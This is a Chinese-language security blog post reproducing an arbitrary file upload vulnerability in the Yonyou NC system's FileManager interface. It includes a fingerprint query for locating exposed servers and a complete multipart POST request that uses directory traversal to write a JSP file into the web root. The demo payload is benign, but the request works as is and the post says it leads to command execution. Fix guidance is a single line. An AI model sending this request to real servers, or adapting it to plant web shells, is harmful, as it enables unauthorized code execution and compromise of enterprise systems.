2024年8月26日01:47:49评论115 views字数 829阅读2分45秒阅读模式

0x01 漏洞名称

用友NC系统FileManager接口存在任意文件上传

0x02 漏洞介绍

用友NC系统FileManager接口处存在任意文件上传，攻击者可通过该漏洞进行命令执行

0x03 影响范围

用友NC系统

0x04 网络空间测绘查询

app="用友-UFIDA-NC"

0x05 漏洞复现

POST /portal/pt/file/upload?pageId=login&filemanager=nc.uap.lfw.file.FileManager&iscover=true&billitem=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwebapps%5Cnc_web%5C HTTP/1.1Host: 11.11.11.11User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: closeContent-Length: 201Content-Type: multipart/form-data;boundary=d0b7a0d40eed0e32904c8017b09eb305Accept-Encoding: gzip, deflate

--d0b7a0d40eed0e32904c8017b09eb305Content-Disposition: form-data; name="file"; filename="te1st.jsp" Content-Type: text/plain

<%out.print("Hello World");%>--d0b7a0d40eed0e32904c8017b09eb305--

用友NC系统FileManager接口处存在任意文件上传【漏洞复现】

访问文件

用友NC系统FileManager接口处存在任意文件上传【漏洞复现】

0x06 nuclei批量验证

用友NC系统FileManager接口处存在任意文件上传【漏洞复现】

0x07 修复建议

升级至最新版本

探索队）：用友NC系统FileManager接口处存在任意文件上传【漏洞复现】

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

用友NC系统FileManager接口处存在任意文件上传【漏洞复现】

访问文件

Zyxel-NBG2105-身份验证绕过（CVE-2021-3297）

Zyxel-NBG2105-身份验证绕过-CVE-2021-3297

H3C多系列路由器存在任意用户登录漏洞 POC

Vite 任意文件读取漏洞 (CVE-2025-32395)

Vite 任意文件读取系列漏洞(附POC)

YesWiki知识库edit接口存在任意文件读取漏洞附POC

Vite vite-project接口存在任意文件读取漏洞CNNVD-202504-684 附POC

Windows远程桌面服务漏洞可远程执行恶意代码

三汇SMG网关管理软件远程代码执行漏洞

CVE-2025-1974｜Kubernetes Ingress NGINX 中存在严重 RCE 漏洞

发表评论